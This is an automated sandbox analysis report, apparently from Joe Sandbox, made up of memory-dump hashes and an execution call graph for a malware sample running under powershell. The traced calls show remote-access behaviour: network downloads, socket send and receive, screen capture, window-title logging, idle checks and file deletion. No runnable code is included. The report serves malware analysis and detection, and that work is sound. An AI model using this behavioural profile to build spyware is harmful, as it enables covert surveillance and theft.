                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4c008b33f19a894764d6e32b4420fc5b02731461b8cc7ef1e088120c55ec1d2
                                                                                                                                  • Instruction ID: 11ac670b441512a77aec91fcee97b5501f7bc330d204355d9ef8439c32808f0a
                                                                                                                                  • Opcode Fuzzy Hash: c4c008b33f19a894764d6e32b4420fc5b02731461b8cc7ef1e088120c55ec1d2
                                                                                                                                  • Instruction Fuzzy Hash: 01E0D8327043458BDF29667490253AD7752FFE27A8F1140D6C461D764ADA308806C3A2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$8#0g$@#e$@#e$h%2g$h%2g
                                                                                                                                  • API String ID: 0-391320511
                                                                                                                                  • Opcode ID: 55c59fdc05ac42858ecbce0b9218f4c9f8c59eb94cce72da0d38b2c5f588e2e6
                                                                                                                                  • Instruction ID: 7dabad7f3d3b4fd9c251f9e91dd43fde9974a18adb49fa21f7c29eca5e3a70cb
                                                                                                                                  • Opcode Fuzzy Hash: 55c59fdc05ac42858ecbce0b9218f4c9f8c59eb94cce72da0d38b2c5f588e2e6
                                                                                                                                  • Instruction Fuzzy Hash: 80E1D035B042159FDB14DBA8C860A6ABBE6FBC4314F2885BAD949CB342DB71DC41CBD1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_12_2_830000_powershell.jbxd
Similarity
• API ID:
• String ID: @#e$@#e$L4#p$L4#p$L4#p$L:x$L:x$L:x
• API String ID: 0-2735108596
• Opcode ID: 9622bb3797ca9726e669ede86d71663db54fd14d70ce9a0d60c40b7e1d7539da
• Instruction ID: b42e03f594be7235a997bd74d1c1ffd4641fdcf4d1ad692546713dff12c000a7
• Opcode Fuzzy Hash: 9622bb3797ca9726e669ede86d71663db54fd14d70ce9a0d60c40b7e1d7539da
• Instruction Fuzzy Hash: 3951E171B00209EBDF159A6898207BE77A6FBC0318F248076E645CB281DB74DE45CBA2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_830000_powershell.jbxd
Similarity
• API ID:
• String ID: $;x$$;x$$;x$@#e$@#e$L4#p$L4#p$L4#p
• API String ID: 0-3165539518
• Opcode ID: 2903bc9a2336e97d7e5d5697c6a815dc9637b48911e10ed911b0fae27197a169
• Instruction ID: bb70ca014f60cf9a4a8a1d2b89b5bbfdcf73030ae285dee324efafeb7b6e17f2
• Opcode Fuzzy Hash: 2903bc9a2336e97d7e5d5697c6a815dc9637b48911e10ed911b0fae27197a169
• Instruction Fuzzy Hash: 7051F171B00349ABDF159A68C821BAE77A2FBC0314F248075E915CB285EB75ED51CFA2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.407124648.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_830000_powershell.jbxd
Similarity
• API ID:
• String ID: (:x$(:x$(:x$@#e$@#e$L4#p$L4#p$L4#p
• API String ID: 0-1136836073
• Opcode ID: 5280141583465dc7d48d17d795109445845d6f47592898e8301ba151bb02775c
• Instruction ID: 392c4db409270d4e069a89c9c11ed25b9a1e1c2a93e52e54f20830171af04c2c
• Opcode Fuzzy Hash: 5280141583465dc7d48d17d795109445845d6f47592898e8301ba151bb02775c
• Instruction Fuzzy Hash: 3651E131B00209EBDF269A64C8247AF77A6FBC1314F248036E951DB292DB74DD41CBE2

Execution Graph

Execution Coverage: 6.5%
Dynamic/Decrypted Code Coverage: 16.4%
Signature Coverage: 3.5%
Total number of Nodes: 1823
Total number of Limit Nodes: 56
                                                                                                                                  execution_graph 53075 415d41 53090 41b411 53075->53090 53077 415d4a 53101 4020f6 53077->53101 53082 4170c4 53125 401e8d 53082->53125 53086 401fd8 11 API calls 53087 4170d9 53086->53087 53088 401fd8 11 API calls 53087->53088 53089 4170e5 53088->53089 53131 4020df 53090->53131 53095 41b456 InternetReadFile 53100 41b479 53095->53100 53096 41b4a6 InternetCloseHandle InternetCloseHandle 53098 41b4b8 53096->53098 53098->53077 53099 401fd8 11 API calls 53099->53100 53100->53095 53100->53096 53100->53099 53142 4020b7 53100->53142 53102 40210c 53101->53102 53103 4023ce 11 API calls 53102->53103 53104 402126 53103->53104 53105 402569 28 API calls 53104->53105 53106 402134 53105->53106 53107 404aa1 53106->53107 53108 404ab4 53107->53108 53209 40520c 53108->53209 53110 404ac9 _Yarn 53111 404b40 WaitForSingleObject 53110->53111 53112 404b20 53110->53112 53114 404b56 53111->53114 53113 404b32 send 53112->53113 53115 404b7b 53113->53115 53215 4210cb 54 API calls 53114->53215 53118 401fd8 11 API calls 53115->53118 53117 404b69 SetEvent 53117->53115 53119 404b83 53118->53119 53120 401fd8 11 API calls 53119->53120 53121 404b8b 53120->53121 53121->53082 53122 401fd8 53121->53122 53123 4023ce 11 API calls 53122->53123 53124 401fe1 53123->53124 53124->53082 53126 402163 53125->53126 53130 40219f 53126->53130 53233 402730 11 API calls 53126->53233 53128 402184 53234 402712 11 API calls std::_Deallocate 53128->53234 53130->53086 53132 4020e7 53131->53132 53148 4023ce 53132->53148 53134 4020f2 53135 43bda0 53134->53135 53140 4461b8 __Getctype 53135->53140 53136 4461f6 53164 44062d 20 API calls _abort 53136->53164 53137 4461e1 RtlAllocateHeap 53139 41b42f InternetOpenW InternetOpenUrlW 53137->53139 53137->53140 53139->53095 53140->53136 53140->53137 53163 443001 7 API calls 2 library calls 53140->53163 53143 4020bf 53142->53143 53144 4023ce 11 API calls 
53143->53144 53145 4020ca 53144->53145 53165 40250a 53145->53165 53147 4020d9 53147->53100 53149 402428 53148->53149 53150 4023d8 53148->53150 53149->53134 53150->53149 53152 4027a7 53150->53152 53153 402e21 53152->53153 53156 4016b4 53153->53156 53155 402e30 53155->53149 53158 4016c6 53156->53158 53159 4016cb 53156->53159 53157 4016f3 53157->53155 53162 43bd68 11 API calls _abort 53158->53162 53159->53157 53159->53158 53161 43bd67 53162->53161 53163->53140 53164->53139 53166 40251a 53165->53166 53167 402520 53166->53167 53168 402535 53166->53168 53172 402569 53167->53172 53182 4028e8 53168->53182 53171 402533 53171->53147 53193 402888 53172->53193 53174 40257d 53175 402592 53174->53175 53176 4025a7 53174->53176 53198 402a34 22 API calls 53175->53198 53178 4028e8 28 API calls 53176->53178 53181 4025a5 53178->53181 53179 40259b 53199 4029da 22 API calls 53179->53199 53181->53171 53183 4028f1 53182->53183 53184 402953 53183->53184 53185 4028fb 53183->53185 53207 4028a4 22 API calls 53184->53207 53188 402904 53185->53188 53190 402917 53185->53190 53201 402cae 53188->53201 53189 402915 53189->53171 53190->53189 53192 4023ce 11 API calls 53190->53192 53192->53189 53194 402890 53193->53194 53195 402898 53194->53195 53200 402ca3 22 API calls 53194->53200 53195->53174 53198->53179 53199->53181 53202 402cb8 __EH_prolog 53201->53202 53208 402e54 22 API calls 53202->53208 53204 4023ce 11 API calls 53206 402d92 53204->53206 53205 402d24 53205->53204 53206->53189 53208->53205 53210 405214 53209->53210 53211 4023ce 11 API calls 53210->53211 53212 40521f 53211->53212 53216 405234 53212->53216 53214 40522e 53214->53110 53215->53117 53217 405240 53216->53217 53218 40526e 53216->53218 53220 4028e8 28 API calls 53217->53220 53232 4028a4 22 API calls 53218->53232 53222 40524a 53220->53222 53222->53214 53233->53128 53234->53130 53235 10006d60 53236 10006d69 53235->53236 53237 10006d72 53235->53237 53239 10006c5f 53236->53239 53259 10005af6 GetLastError 53239->53259 53241 10006c6c 53279 
10006d7e 53241->53279 53243 10006c74 53288 100069f3 53243->53288 53246 10006c8b 53246->53237 53252 10006cc9 53312 10006368 19 API calls _abort 53252->53312 53254 10006d12 53255 10006cce 53254->53255 53315 100068c9 25 API calls 53254->53315 53313 1000571e 19 API calls __dosmaperr 53255->53313 53256 10006ce6 53256->53254 53314 1000571e 19 API calls __dosmaperr 53256->53314 53260 10005b12 53259->53260 53261 10005b0c 53259->53261 53265 10005b61 SetLastError 53260->53265 53317 1000637b 19 API calls 2 library calls 53260->53317 53316 10005e08 10 API calls 2 library calls 53261->53316 53264 10005b24 53266 10005b2c 53264->53266 53319 10005e5e 10 API calls 2 library calls 53264->53319 53265->53241 53318 1000571e 19 API calls __dosmaperr 53266->53318 53268 10005b41 53268->53266 53270 10005b48 53268->53270 53320 1000593c 19 API calls _abort 53270->53320 53271 10005b32 53273 10005b6d SetLastError 53271->53273 53322 100055a8 36 API calls _abort 53273->53322 53274 10005b53 53321 1000571e 19 API calls __dosmaperr 53274->53321 53278 10005b5a 53278->53265 53278->53273 53280 10006d8a ___DestructExceptionObject 53279->53280 53281 10005af6 _abort 36 API calls 53280->53281 53286 10006d94 53281->53286 53283 10006e18 _abort 53283->53243 53286->53283 53323 100055a8 36 API calls _abort 53286->53323 53324 10005671 RtlEnterCriticalSection 53286->53324 53325 1000571e 19 API calls __dosmaperr 53286->53325 53326 10006e0f RtlLeaveCriticalSection _abort 53286->53326 53327 100054a7 53288->53327 53291 10006a14 GetOEMCP 53294 10006a3d 53291->53294 53292 10006a26 53293 10006a2b GetACP 53292->53293 53292->53294 53293->53294 53294->53246 53295 100056d0 53294->53295 53296 1000570e 53295->53296 53300 100056de _abort 53295->53300 53338 10006368 19 API calls _abort 53296->53338 53297 100056f9 RtlAllocateHeap 53299 1000570c 53297->53299 53297->53300 53299->53255 53302 10006e20 53299->53302 53300->53296 53300->53297 53337 1000474f 7 API calls 2 library calls 53300->53337 53303 100069f3 38 API calls 
53302->53303 53304 10006e3f 53303->53304 53307 10006e90 IsValidCodePage 53304->53307 53309 10006e46 53304->53309 53311 10006eb5 ___scrt_fastfail 53304->53311 53306 10006cc1 53306->53252 53306->53256 53308 10006ea2 GetCPInfo 53307->53308 53307->53309 53308->53309 53308->53311 53349 10002ada 53309->53349 53339 10006acb GetCPInfo 53311->53339 53312->53255 53313->53246 53314->53254 53315->53255 53316->53260 53317->53264 53318->53271 53319->53268 53320->53274 53321->53278 53324->53286 53325->53286 53326->53286 53328 100054c4 53327->53328 53334 100054ba 53327->53334 53329 10005af6 _abort 36 API calls 53328->53329 53328->53334 53330 100054e5 53329->53330 53335 10007a00 36 API calls __fassign 53330->53335 53332 100054fe 53336 10007a2d 36 API calls __fassign 53332->53336 53334->53291 53334->53292 53335->53332 53336->53334 53337->53300 53338->53299 53345 10006b05 53339->53345 53348 10006baf 53339->53348 53342 10002ada _ValidateLocalCookies 5 API calls 53344 10006c5b 53342->53344 53344->53309 53356 100086e4 53345->53356 53347 10008a3e 41 API calls 53347->53348 53348->53342 53350 10002ae3 53349->53350 53351 10002ae5 IsProcessorFeaturePresent 53349->53351 53350->53306 53353 10002b58 53351->53353 53426 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53353->53426 53355 10002c3b 53355->53306 53357 100054a7 __fassign 36 API calls 53356->53357 53358 10008704 MultiByteToWideChar 53357->53358 53360 10008742 53358->53360 53368 100087da 53358->53368 53362 100056d0 20 API calls 53360->53362 53366 10008763 ___scrt_fastfail 53360->53366 53361 10002ada _ValidateLocalCookies 5 API calls 53363 10006b66 53361->53363 53362->53366 53370 10008a3e 53363->53370 53364 100087d4 53375 10008801 19 API calls _free 53364->53375 53366->53364 53367 100087a8 MultiByteToWideChar 53366->53367 53367->53364 53369 100087c4 GetStringTypeW 53367->53369 53368->53361 53369->53364 53371 100054a7 __fassign 36 API calls 53370->53371 53372 10008a51 53371->53372 53376 
10008821 53372->53376 53375->53368 53377 1000883c 53376->53377 53378 10008862 MultiByteToWideChar 53377->53378 53379 10008a16 53378->53379 53380 1000888c 53378->53380 53381 10002ada _ValidateLocalCookies 5 API calls 53379->53381 53383 100056d0 20 API calls 53380->53383 53385 100088ad 53380->53385 53382 10006b87 53381->53382 53382->53347 53383->53385 53384 100088f6 MultiByteToWideChar 53386 1000890f 53384->53386 53402 10008962 53384->53402 53385->53384 53385->53402 53403 10005f19 53386->53403 53390 10008971 53392 10008992 53390->53392 53393 100056d0 20 API calls 53390->53393 53391 10008939 53395 10005f19 10 API calls 53391->53395 53391->53402 53394 10008a07 53392->53394 53396 10005f19 10 API calls 53392->53396 53393->53392 53411 10008801 19 API calls _free 53394->53411 53395->53402 53398 100089e6 53396->53398 53398->53394 53399 100089f5 WideCharToMultiByte 53398->53399 53399->53394 53400 10008a35 53399->53400 53413 10008801 19 API calls _free 53400->53413 53412 10008801 19 API calls _free 53402->53412 53414 10005c45 53403->53414 53405 10005f40 53408 10005f49 53405->53408 53418 10005fa1 9 API calls 2 library calls 53405->53418 53407 10005f89 LCMapStringW 53407->53408 53409 10002ada _ValidateLocalCookies 5 API calls 53408->53409 53410 10005f9b 53409->53410 53410->53390 53410->53391 53410->53402 53411->53402 53412->53379 53413->53402 53415 10005c71 53414->53415 53417 10005c75 __crt_fast_encode_pointer 53414->53417 53415->53417 53419 10005ce1 53415->53419 53417->53405 53418->53407 53420 10005d02 LoadLibraryExW 53419->53420 53421 10005cf7 53419->53421 53422 10005d37 53420->53422 53423 10005d1f GetLastError 53420->53423 53421->53415 53422->53421 53425 10005d4e FreeLibrary 53422->53425 53423->53422 53424 10005d2a LoadLibraryExW 53423->53424 53424->53422 53425->53421 53426->53355 53427 434906 53432 434bd8 SetUnhandledExceptionFilter 53427->53432 53429 43490b pre_c_initialization 53433 4455cc 20 API calls 2 library calls 53429->53433 53431 434916 53432->53429 53433->53431 
53434 416be6 53454 401e65 53434->53454 53436 416bf2 53437 416c07 53436->53437 53438 416c1e 53436->53438 53439 401e65 22 API calls 53437->53439 53440 401e65 22 API calls 53438->53440 53441 416c0c 53439->53441 53442 416c23 53440->53442 53443 4020f6 28 API calls 53441->53443 53444 4020f6 28 API calls 53442->53444 53445 416c17 53443->53445 53444->53445 53459 417308 53445->53459 53448 401e8d 11 API calls 53449 4170cd 53448->53449 53450 401fd8 11 API calls 53449->53450 53451 4170d9 53450->53451 53452 401fd8 11 API calls 53451->53452 53453 4170e5 53452->53453 53455 401e6d 53454->53455 53456 401e75 53455->53456 53493 402158 22 API calls 53455->53493 53456->53436 53460 4174c0 53459->53460 53461 41731e 53459->53461 53463 401fd8 11 API calls 53460->53463 53494 4046f7 53461->53494 53465 416c38 53463->53465 53465->53448 53468 4174b2 53603 404ee2 99 API calls 53468->53603 53473 417365 53570 402ea1 53473->53570 53476 404aa1 61 API calls 53477 417380 53476->53477 53478 401fd8 11 API calls 53477->53478 53479 417388 53478->53479 53480 401fd8 11 API calls 53479->53480 53490 417390 53480->53490 53483 4020b7 28 API calls 53483->53490 53485 41bdaf 28 API calls 53485->53490 53486 402ea1 28 API calls 53486->53490 53487 404aa1 61 API calls 53487->53490 53488 401fd8 11 API calls 53488->53490 53490->53483 53490->53485 53490->53486 53490->53487 53490->53488 53491 4174a7 53490->53491 53579 41b80c GlobalMemoryStatusEx 53490->53579 53580 41b890 GetSystemTimes Sleep GetSystemTimes 53490->53580 53582 41bb27 53490->53582 53587 401f09 53490->53587 53590 404e26 WaitForSingleObject 53491->53590 53495 4020df 11 API calls 53494->53495 53496 404707 53495->53496 53497 4020df 11 API calls 53496->53497 53498 40471e 53497->53498 53499 404736 53498->53499 53604 40482d 53498->53604 53501 4048c8 connect 53499->53501 53502 404a1b 53501->53502 53503 4048ee 53501->53503 53504 40497e 53502->53504 53505 404a21 WSAGetLastError 53502->53505 53503->53504 53506 404923 53503->53506 53612 40531e 53503->53612 53504->53468 
53561 41bdaf 53504->53561 53505->53504 53507 404a31 53505->53507 53647 420cf1 27 API calls 53506->53647 53509 404932 53507->53509 53510 404a36 53507->53510 53515 402093 28 API calls 53509->53515 53652 41cb72 30 API calls 53510->53652 53512 40490f 53617 402093 53512->53617 53514 40492b 53514->53509 53518 404941 53514->53518 53519 404a80 53515->53519 53517 404a40 53653 4052fd 28 API calls 53517->53653 53525 404950 53518->53525 53526 404987 53518->53526 53522 402093 28 API calls 53519->53522 53527 404a8f 53522->53527 53529 402093 28 API calls 53525->53529 53649 421ad1 54 API calls 53526->53649 53530 41b580 80 API calls 53527->53530 53533 40495f 53529->53533 53530->53504 53536 402093 28 API calls 53533->53536 53534 40498f 53537 4049c4 53534->53537 53538 404994 53534->53538 53540 40496e 53536->53540 53651 420e97 28 API calls 53537->53651 53542 402093 28 API calls 53538->53542 53545 41b580 80 API calls 53540->53545 53544 4049a3 53542->53544 53547 402093 28 API calls 53544->53547 53548 404973 53545->53548 53546 4049cc 53549 4049f9 CreateEventW CreateEventW 53546->53549 53551 402093 28 API calls 53546->53551 53550 4049b2 53547->53550 53648 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53548->53648 53549->53504 53552 41b580 80 API calls 53550->53552 53554 4049e2 53551->53554 53555 4049b7 53552->53555 53556 402093 28 API calls 53554->53556 53650 421143 52 API calls 53555->53650 53558 4049f1 53556->53558 53559 41b580 80 API calls 53558->53559 53560 4049f6 53559->53560 53560->53549 53562 41bdbc 53561->53562 53563 4020b7 28 API calls 53562->53563 53564 41734f 53563->53564 53565 402f31 53564->53565 53566 4020df 11 API calls 53565->53566 53567 402f3d 53566->53567 53568 4032a0 28 API calls 53567->53568 53569 402f59 53568->53569 53569->53473 53572 402eb0 53570->53572 53571 402ef2 53573 401fb0 28 API calls 53571->53573 53572->53571 53577 402ee7 53572->53577 53574 402ef0 53573->53574 53575 402055 11 API calls 53574->53575 53576 402f09 53575->53576 
53576->53476 53712 403365 28 API calls 53577->53712 53579->53490 53581 41b8d5 _swprintf __aulldiv 53580->53581 53581->53490 53713 436f10 53582->53713 53588 402252 11 API calls 53587->53588 53589 401f12 53588->53589 53589->53490 53591 404e40 SetEvent CloseHandle 53590->53591 53592 404e57 closesocket 53590->53592 53593 404ed8 53591->53593 53594 404e64 53592->53594 53593->53468 53595 404e7a 53594->53595 53762 4050e4 84 API calls 53594->53762 53596 404e8c WaitForSingleObject 53595->53596 53597 404ece SetEvent CloseHandle 53595->53597 53763 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53596->53763 53597->53593 53600 404e9b SetEvent WaitForSingleObject 53764 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53600->53764 53602 404eb3 SetEvent CloseHandle CloseHandle 53602->53597 53605 404846 socket 53604->53605 53606 404839 53604->53606 53607 404860 CreateEventW 53605->53607 53608 404842 53605->53608 53611 40489e WSAStartup 53606->53611 53607->53499 53608->53499 53610 40483e 53610->53605 53610->53608 53611->53610 53613 4020df 11 API calls 53612->53613 53614 40532a 53613->53614 53654 4032a0 53614->53654 53616 405346 53616->53512 53618 40209b 53617->53618 53619 4023ce 11 API calls 53618->53619 53620 4020a6 53619->53620 53658 4024ed 53620->53658 53623 41b580 53624 41b631 53623->53624 53625 41b596 GetLocalTime 53623->53625 53626 401fd8 11 API calls 53624->53626 53627 40531e 28 API calls 53625->53627 53629 41b639 53626->53629 53628 41b5d8 53627->53628 53662 406383 53628->53662 53631 401fd8 11 API calls 53629->53631 53633 41b641 53631->53633 53633->53506 53636 406383 28 API calls 53637 41b5fc 53636->53637 53672 40723b 77 API calls 53637->53672 53639 41b60a 53640 401fd8 11 API calls 53639->53640 53641 41b616 53640->53641 53642 401fd8 11 API calls 53641->53642 53643 41b61f 53642->53643 53644 401fd8 11 API calls 53643->53644 53645 41b628 53644->53645 53646 401fd8 11 API calls 53645->53646 53646->53624 53647->53514 53648->53504 
53649->53534 53650->53548 53651->53546 53652->53517 53656 4032aa 53654->53656 53655 4032c9 53655->53616 53656->53655 53657 4028e8 28 API calls 53656->53657 53657->53655 53659 4024f9 53658->53659 53660 40250a 28 API calls 53659->53660 53661 4020b1 53660->53661 53661->53623 53673 4051ef 53662->53673 53664 406391 53677 402055 53664->53677 53667 402f10 53709 401fb0 53667->53709 53669 402f1e 53670 402055 11 API calls 53669->53670 53671 402f2d 53670->53671 53671->53636 53672->53639 53674 4051fb 53673->53674 53683 405274 53674->53683 53676 405208 53676->53664 53678 402061 53677->53678 53679 4023ce 11 API calls 53678->53679 53680 40207b 53679->53680 53705 40267a 53680->53705 53684 405282 53683->53684 53685 405288 53684->53685 53686 40529e 53684->53686 53694 4025f0 53685->53694 53688 4052f5 53686->53688 53689 4052b6 53686->53689 53703 4028a4 22 API calls 53688->53703 53692 4028e8 28 API calls 53689->53692 53693 40529c 53689->53693 53692->53693 53693->53676 53695 402888 22 API calls 53694->53695 53696 402602 53695->53696 53697 402672 53696->53697 53698 402629 53696->53698 53704 4028a4 22 API calls 53697->53704 53700 4028e8 28 API calls 53698->53700 53702 40263b 53698->53702 53700->53702 53702->53693 53706 40268b 53705->53706 53707 4023ce 11 API calls 53706->53707 53708 40208d 53707->53708 53708->53667 53710 4025f0 28 API calls 53709->53710 53711 401fbd 53710->53711 53711->53669 53712->53574 53714 41bb46 GetForegroundWindow GetWindowTextW 53713->53714 53715 40417e 53714->53715 53716 404186 53715->53716 53721 402252 53716->53721 53718 404191 53725 4041bc 53718->53725 53722 40225c 53721->53722 53723 4022ac 53721->53723 53722->53723 53729 402779 11 API calls std::_Deallocate 53722->53729 53723->53718 53726 4041c8 53725->53726 53730 4041d9 53726->53730 53728 40419c 53728->53490 53729->53723 53731 4041e9 53730->53731 53732 404206 53731->53732 53733 4041ef 53731->53733 53747 4027e6 53732->53747 53737 404267 53733->53737 53736 404204 53736->53728 53738 402888 22 API calls 
53737->53738 53739 40427b 53738->53739 53740 404290 53739->53740 53741 4042a5 53739->53741 53758 4042df 22 API calls 53740->53758 53742 4027e6 28 API calls 53741->53742 53746 4042a3 53742->53746 53744 404299 53759 402c48 22 API calls 53744->53759 53746->53736 53748 4027ef 53747->53748 53749 402851 53748->53749 53750 4027f9 53748->53750 53761 4028a4 22 API calls 53749->53761 53753 402802 53750->53753 53754 402815 53750->53754 53760 402aea 28 API calls __EH_prolog 53753->53760 53756 402813 53754->53756 53757 402252 11 API calls 53754->53757 53756->53736 53757->53756 53758->53744 53759->53746 53760->53756 53762->53595 53763->53600 53764->53602 53765 1000c7a7 53766 1000c7be 53765->53766 53771 1000c82c 53765->53771 53766->53771 53775 1000c7e6 GetModuleHandleA 53766->53775 53767 1000c872 53768 1000c835 GetModuleHandleA 53770 1000c83f 53768->53770 53770->53770 53770->53771 53771->53767 53771->53768 53776 1000c7ef 53775->53776 53782 1000c82c 53775->53782 53785 1000c803 53776->53785 53778 1000c872 53779 1000c835 GetModuleHandleA 53780 1000c83f 53779->53780 53780->53780 53780->53782 53782->53778 53782->53779 53786 1000c809 53785->53786 53787 1000c82c 53786->53787 53788 1000c80d VirtualProtect 53786->53788 53790 1000c872 53787->53790 53791 1000c835 GetModuleHandleA 53787->53791 53788->53787 53789 1000c81c VirtualProtect 53788->53789 53789->53787 53792 1000c83f 53791->53792 53792->53787 53793 43bea8 53796 43beb4 _swprintf ___BuildCatchObject 53793->53796 53794 43bec2 53809 44062d 20 API calls _abort 53794->53809 53796->53794 53797 43beec 53796->53797 53804 445909 EnterCriticalSection 53797->53804 53799 43bef7 53805 43bf98 53799->53805 53800 43bec7 ___BuildCatchObject ___std_exception_copy 53804->53799 53806 43bfa6 53805->53806 53808 43bf02 53806->53808 53811 4497ec 37 API calls 2 library calls 53806->53811 53810 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53808->53810 53809->53800 53810->53800 53811->53806 53812 4458c8 53813 4458d3 53812->53813 53815 4458fc 53813->53815 
53816 4458f8 53813->53816 53818 448b04 53813->53818 53825 445920 DeleteCriticalSection 53815->53825 53826 44854a 53818->53826 53821 448b49 InitializeCriticalSectionAndSpinCount 53822 448b34 53821->53822 53833 43502b 53822->53833 53824 448b60 53824->53813 53825->53816 53827 448576 53826->53827 53828 44857a 53826->53828 53827->53828 53830 44859a 53827->53830 53840 4485e6 53827->53840 53828->53821 53828->53822 53830->53828 53831 4485a6 GetProcAddress 53830->53831 53832 4485b6 __crt_fast_encode_pointer 53831->53832 53832->53828 53834 435036 IsProcessorFeaturePresent 53833->53834 53835 435034 53833->53835 53837 435078 53834->53837 53835->53824 53847 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53837->53847 53839 43515b 53839->53824 53841 448607 LoadLibraryExW 53840->53841 53846 4485fc 53840->53846 53842 448624 GetLastError 53841->53842 53843 44863c 53841->53843 53842->53843 53844 44862f LoadLibraryExW 53842->53844 53845 448653 FreeLibrary 53843->53845 53843->53846 53844->53843 53845->53846 53846->53827 53847->53839 53848 418acd 53849 418af0 53848->53849 53850 418af8 SHCreateMemStream 53849->53850 53861 418691 GdipLoadImageFromStream 53850->53861 53852 418b0c 53862 4192c9 23 API calls new 53852->53862 53854 418b1a SHCreateMemStream 53863 418706 GdipSaveImageToStream 53854->53863 53856 418b62 53857 40520c 28 API calls 53856->53857 53858 418b7b 53857->53858 53865 4186b4 GdipDisposeImage 53858->53865 53860 418bbd 53861->53852 53862->53854 53864 418726 53863->53864 53864->53856 53865->53860 53866 41e04e 53867 41e063 _Yarn ___scrt_fastfail 53866->53867 53868 41e266 53867->53868 53869 432f55 21 API calls 53867->53869 53874 41e21a 53868->53874 53880 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53868->53880 53873 41e213 ___scrt_fastfail 53869->53873 53871 41e277 53871->53874 53881 432f55 53871->53881 53873->53874 53875 432f55 21 API calls 53873->53875 53878 41e240 ___scrt_fastfail 
53875->53878 53876 41e2b0 ___scrt_fastfail 53876->53874 53886 4335db 53876->53886 53878->53874 53879 432f55 21 API calls 53878->53879 53879->53868 53880->53871 53882 432f63 53881->53882 53883 432f5f 53881->53883 53884 43bda0 new 21 API calls 53882->53884 53883->53876 53885 432f68 53884->53885 53885->53876 53889 4334fa 53886->53889 53888 4335e3 53888->53874 53890 433513 53889->53890 53893 433509 53889->53893 53891 432f55 21 API calls 53890->53891 53890->53893 53892 433534 53891->53892 53892->53893 53895 4338c8 CryptAcquireContextA 53892->53895 53893->53888 53896 4338e9 CryptGenRandom 53895->53896 53897 4338e4 53895->53897 53896->53897 53898 4338fe CryptReleaseContext 53896->53898 53897->53893 53898->53897 53899 426c6d 53905 426d42 recv 53899->53905 53906 4161ee 53907 401e65 22 API calls 53906->53907 53908 4161f9 53907->53908 53950 43bb2c 53908->53950 53911 401e65 22 API calls 53912 416214 53911->53912 53913 4020f6 28 API calls 53912->53913 53914 41621e 53913->53914 53915 416265 53914->53915 53916 416236 53914->53916 53918 401e65 22 API calls 53915->53918 53917 401e65 22 API calls 53916->53917 53919 41623b 53917->53919 53920 41626a 53918->53920 53921 4020f6 28 API calls 53919->53921 53922 4020f6 28 API calls 53920->53922 53923 416246 53921->53923 53924 416275 53922->53924 53926 4020f6 28 API calls 53923->53926 53925 4020f6 28 API calls 53924->53925 53927 416284 53925->53927 53928 416255 53926->53928 53929 4187aa 147 API calls 53927->53929 53954 4187aa 53928->53954 53931 416261 53929->53931 53932 401e65 22 API calls 53931->53932 53933 41629e 53932->53933 53934 43bb2c _strftime 40 API calls 53933->53934 53935 4162ab 53934->53935 53936 401e65 22 API calls 53935->53936 53937 4162c0 53936->53937 53938 43bb2c _strftime 40 API calls 53937->53938 53939 4162cd 53938->53939 54015 418977 102 API calls 53939->54015 53941 4162d6 53942 4170c4 53941->53942 53943 401fd8 11 API calls 53941->53943 53944 401e8d 11 API calls 53942->53944 53943->53942 53945 4170cd 53944->53945 53946 
[Execution graph. This part of the report is Joe Sandbox's interactive execution-graph view flattened into text: each node is a graph node id followed by a function address in the sample and, where resolved, the API names or CRT labels of that function; "id->id" tokens are the edges. The listing is not readable as a graph here, but the following can be recovered from it:
Screen-capture code in the sample's own image (around 0x418eb1, 0x4194ff and 0x419196): GdiplusStartup, EnumDisplayMonitors, EnumDisplayDevicesW, EnumDisplaySettingsW, GetMonitorInfoW, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, BitBlt, GetCursorInfo, GetIconInfo, DrawIcon, GetObjectA, GetDIBits, LocalAlloc, GlobalAlloc, GlobalFree, DeleteDC, DeleteObject.
Idle-time and timing checks around 0x415bc1 and 0x41bb77: GetLastInputInfo, GetTickCount, GetLocalTime, Sleep.
Threading, synchronisation and socket I/O: CreateThread, CreateEventA, SetEvent, WaitForSingleObject, CloseHandle, recv, send.
Host, registry and file lookups: GetModuleFileNameW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetEnvironmentVariableW, FindFirstFileW, FindNextFileW, FindClose, DeleteFileW; embedded-resource access via FindResourceA, LoadResource, LockResource, SizeofResource; dynamic API resolution at 0x41cbe1 via LoadLibraryA, GetModuleHandleA, GetProcAddress.
